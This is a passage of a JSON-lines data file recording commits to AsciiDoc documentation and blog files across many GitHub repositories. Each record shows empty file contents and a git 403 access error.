2017-05-22-Elo-adasban.adoc","repos":"neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io","old_file":"_posts\/2017-05-22-Elo-adasban.adoc","new_file":"_posts\/2017-05-22-Elo-adasban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neurodiversitas\/neurodiversitas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15e9c3f85862a2867a2bbb9fbd45200d0aa596a6","subject":"cleaned up client vs source vs view","message":"cleaned up client vs source vs view\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c3dc22acd6cf2b16eaf8030c24d82c993fd3f67","subject":"Follow-up edit to PR#3680","message":"Follow-up edit to PR#3680\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/high_availability.adoc","new_file":"admin_guide\/high_availability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a3305ecab8ef62aa927aab4e4da4c364d33df10","subject":"README: \"Crediting information\" section","message":"README: \"Crediting information\" section\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ef9516909a07654ab9d0f74def7f79c60db8fb8a","subject":"just copied md to adoc... hmm","message":"just copied md to adoc... 
hmm\n","repos":"markllama\/aws-cli-thor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/aws-cli-thor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf17bc8ed514afafce360d5fafb003fb71e53943","subject":"Create README.adoc","message":"Create README.adoc\n","repos":"drumonii\/SpringBootTwoDataSources","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/drumonii\/SpringBootTwoDataSources.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f01ea22f8917c6b44f9b367bc217261d6ea5b8fc","subject":"readme4","message":"readme4\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2796bf023fdf69ff997481fa6124c6c689f53b4","subject":"Added DateTime docs","message":"Added DateTime docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c68075adf910d9a4cc1eab4c055a2ab7e3789c4","subject":"Added ComponentConfiguration to docs","message":"Added ComponentConfiguration to 
docs\n","repos":"adessaigne\/camel,tadayosi\/camel,DariusX\/camel,nicolaferraro\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,gnodet\/camel,pmoerenhout\/camel,apache\/camel,nikhilvibhav\/camel,ullgren\/camel,cunningt\/camel,tdiesler\/camel,christophd\/camel,onders86\/camel,zregvart\/camel,zregvart\/camel,pmoerenhout\/camel,adessaigne\/camel,cunningt\/camel,DariusX\/camel,punkhorn\/camel-upstream,apache\/camel,tadayosi\/camel,adessaigne\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,davidkarlsen\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,davidkarlsen\/camel,CodeSmell\/camel,nicolaferraro\/camel,objectiser\/camel,kevinearls\/camel,onders86\/camel,tdiesler\/camel,kevinearls\/camel,objectiser\/camel,mcollovati\/camel,DariusX\/camel,christophd\/camel,kevinearls\/camel,onders86\/camel,davidkarlsen\/camel,CodeSmell\/camel,davidkarlsen\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,mcollovati\/camel,tdiesler\/camel,kevinearls\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,gnodet\/camel,nikhilvibhav\/camel,zregvart\/camel,CodeSmell\/camel,zregvart\/camel,kevinearls\/camel,gnodet\/camel,Fabryprog\/camel,pmoerenhout\/camel,tadayosi\/camel,pax95\/camel,ullgren\/camel,pmoerenhout\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,apache\/camel,tdiesler\/camel,onders86\/camel,christophd\/camel,pax95\/camel,mcollovati\/camel,Fabryprog\/camel,nicolaferraro\/camel,tdiesler\/camel,christophd\/camel,onders86\/camel,apache\/camel,apache\/camel,gnodet\/camel,onders86\/camel,DariusX\/camel,pax95\/camel,alvinkwekel\/camel,alvinkwekel\/camel,tdiesler\/camel,cunningt\/camel,kevinearls\/camel,CodeSmell\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,objectiser\/camel,ullgren\/camel,nikhilvibhav\/camel,objectiser\/camel,adessaigne\/camel,alvinkwekel\/camel,Fabryprog\/camel","old_file":"docs\/user-manual\/en\/componentconfiguration.adoc","new_file":"docs\/user-manual\/en\/componentconfiguration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cd7e8dcda88eb14cfb5550b9e0575f4d88ca3a3","subject":"Added log instruction","message":"Added log instruction\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80295513a91cca2a140c138164e3c0d1bdad2435","subject":"Update 2013-06-07-Sparta.adoc","message":"Update 2013-06-07-Sparta.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-07-Sparta.adoc","new_file":"_posts\/2013-06-07-Sparta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3606e78bc0ec263242a47823b464f350c3635404","subject":"Update 2016-04-07-T-D-D-for-J-S-Learners.adoc","message":"Update 2016-04-07-T-D-D-for-J-S-Learners.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog,metasean\/blog","old_file":"_posts\/2016-04-07-T-D-D-for-J-S-Learners.adoc","new_file":"_posts\/2016-04-07-T-D-D-for-J-S-Learners.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f1e9dfa91d5e2a2db34c580e07904a934f85dc1","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45f9b27e44cd3d270ab5fa74160dddb0ab776261","subject":"Update 2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","message":"Update 2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","new_file":"_posts\/2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae09692ba49475583e6ae7cab27444db820df770","subject":"add clojutre 2020","message":"add clojutre 2020\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojutre.adoc","new_file":"content\/events\/2020\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7b8df71ee39cd24831b7489abe4d3b9ea11cf048","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd69f9b78dbc62b17b2bc14ddd44f9fbc09eb5ab","subject":"Update 2016-02-03-What-is-this-Blog-about.adoc","message":"Update 
2016-02-03-What-is-this-Blog-about.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-03-What-is-this-Blog-about.adoc","new_file":"_posts\/2016-02-03-What-is-this-Blog-about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec66fcf61bddeba7145b39acbb6580d71ee097e4","subject":"Update 2016-06-27-json-decode-json-encode.adoc","message":"Update 2016-06-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a75f1f66a854154f3c4241654893b78592127d26","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"659a97a2159180cb344f459d147fd57856a0cbae","subject":"1.10.xxx Release","message":"1.10.xxx Release\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-xx-yy-release.adoc","new_file":"content\/news\/2018-xx-yy-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d373e1b49c85d2fc85d2db083a28b4b837c55220","subject":"Fix the search request default operation behavior doc (#29302) (#29405)","message":"Fix the search request default operation behavior doc (#29302) 
(#29405)\n\n","repos":"coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/reference\/search\/request\/preference.asciidoc","new_file":"docs\/reference\/search\/request\/preference.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7e5baae9b3c0d9e663f5887782b808661164610","subject":"y2b create post Giant Curved OLED 4K TV","message":"y2b create post Giant Curved OLED 4K TV","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-19-Giant-Curved-OLED-4K-TV.adoc","new_file":"_posts\/2015-11-19-Giant-Curved-OLED-4K-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3f6e7cdcc60bbaaaefd4acd28f5bb5902cd5dc","subject":"Update 2015-09-17-Ganesha-Festival-on-17-Sep.adoc","message":"Update 2015-09-17-Ganesha-Festival-on-17-Sep.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-17-Ganesha-Festival-on-17-Sep.adoc","new_file":"_posts\/2015-09-17-Ganesha-Festival-on-17-Sep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a352bd0f7a7e0fc5ffba37a0e336e7f5f8c18492","subject":"Update 2017-05-08-Static-Translations-Bundle.adoc","message":"Update 2017-05-08-Static-Translations-Bundle.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"9f3984ec6139870f9ac1ffcfe28a84e274902eb2","subject":"Update 2016-05-12-Flume.adoc","message":"Update 2016-05-12-Flume.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-12-Flume.adoc","new_file":"_posts\/2016-05-12-Flume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"765a6a226732650ae0c7fe099feaf296e1bed19c","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07648565844e615dc8f15c5b1184eded770717ce","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd0b684e1bdcc7d80ea94fd56b40570861eecdbb","subject":"y2b create post DC Universe Online Collectors Edition (PS3) Unboxing \\u0026 Overview + Macro Shots!","message":"y2b create post DC Universe Online Collectors Edition (PS3) Unboxing \\u0026 Overview + Macro Shots!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-13-DC-Universe-Online-Collectors-Edition-PS3-Unboxing-u0026-Overview--Macro-Shots.adoc","new_file":"_posts\/2011-01-13-DC-Universe-Online-Collectors-Edition-PS3-Unboxing-u0026-Overview--Macro-Shots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b885ab0593b607dda7d6149c0054d7a387edbcd4","subject":"Update 2015-06-01-Weiter-gehts-Die-Story-II.adoc","message":"Update 2015-06-01-Weiter-gehts-Die-Story-II.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Weiter-gehts-Die-Story-II.adoc","new_file":"_posts\/2015-06-01-Weiter-gehts-Die-Story-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3eb0eaf904614fe3c456c1f994663842e268d15f","subject":"Update 2015-05-14-test.adoc","message":"Update 
2015-05-14-test.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-test.adoc","new_file":"_posts\/2015-05-14-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39cc67c53703216ec306b1d6f21fa64f952889a0","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2973f5fcd86aba20a213ba4e54328a138618968","subject":"Update 2016-07-22-Ciao.adoc","message":"Update 2016-07-22-Ciao.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Ciao.adoc","new_file":"_posts\/2016-07-22-Ciao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d6e4cfaef6ffc258c661622ae401b63b6d3fb12","subject":"y2b create post Wearable Bass = MIND BLOWN?","message":"y2b create post Wearable Bass = MIND BLOWN?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-28-Wearable-Bass--MIND-BLOWN.adoc","new_file":"_posts\/2016-06-28-Wearable-Bass--MIND-BLOWN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"489c9fecf728e23a1421a26d3bcb7b2fefce1dbc","subject":"Update 2015-09-30-New-post.adoc","message":"Update 2015-09-30-New-post.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2015-09-30-New-post.adoc","new_file":"_posts\/2015-09-30-New-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e72c14c3afb7f84f01bdf248bb8d2e8ab0878f","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"89887621d94f7da1622170ae603570892b544fa1","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1b7740c0383782eef4feb673f473d981f84f85c","subject":"Update 2019-08-24-Impossible-Box-de-Mexico.adoc","message":"Update 2019-08-24-Impossible-Box-de-Mexico.adoc","repos":"ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io","old_file":"_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc","new_file":"_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImpossibleBlog\/impossibleblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"131e41828e18b37321179d7020054ae2318f5885","subject":"Add README for github.","message":"Add README for github.\n\nSigned-off-by: Florent Bruneau <5d0958454f46908a14eb42e25abfc486c9e7cb2c@polytechnique.org>\n","repos":"Fruneau\/pfixtools,Fruneau\/pfixtools","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fruneau\/pfixtools.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"404c2916bbf7dbb09fb366b8da80e2c266a0ace0","subject":"Update 2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","message":"Update 2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","new_file":"_posts\/2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52a517e2165d4589c456b6c1bc2faede5f3c3637","subject":"Docs: Add example of resetting index setting (#29048)","message":"Docs: Add example of resetting index setting (#29048)\n\nThis commit adds an example using `null` to reset an index settings.\r\n\r\ncloses 
#22870","repos":"s1monw\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/indices\/update-settings.asciidoc","new_file":"docs\/reference\/indices\/update-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc9b4ce056787fa4bda78f2b7a63a628dbe54c4c","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 